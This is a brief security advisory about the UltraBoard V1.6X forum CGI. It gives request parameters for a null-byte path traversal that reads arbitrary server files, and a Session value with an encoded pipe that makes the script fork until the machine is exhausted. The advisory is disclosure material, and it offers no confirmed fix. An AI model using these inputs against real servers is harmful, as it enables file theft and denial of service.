COMMAND

    UltraBoard

SYSTEMS AFFECTED

    UltraBoard V1.6X

PROBLEM

    Rudi Carell found following.  He found some interesting things  in
    the "old" UltraBoard-Forum scripts  (UltraBoard V 1.6).   By using
    the good  old NullByte(\000)  its possible  to open  "any" file on
    the  webserver(with  its  permissions)  running  the  "UltraBoard"
    forum-software.  cgi-script:

        UltraBoard.pl || UltraBoard.cgi

    Variables:

        Action=PrintableTopic
        Post=[path_including_".."_to_any_file][***NULLBYTE***]
        Board=[valid_board]
        Idle=10
        Sort=0
        Order=Descend
        Page=0
        Session=

    hmm ... EOF

    Juan  M.  Bello  Rivas  added  following.   There's  even more fun
    availiable with  old versions  of ultraboard  (and latest  beta of
    ultraboard 2000 is also vulnerable  to this?).  You can  bring the
    web server to its knees by issuing a request to the CGI like this:

        QUERY_STRING=Session=../UltraBoard.pl%00%7c

    It will start forking instances of  the CGI until it eats all  the
    resources of the machine.

SOLUTION

    Newer version fixes this?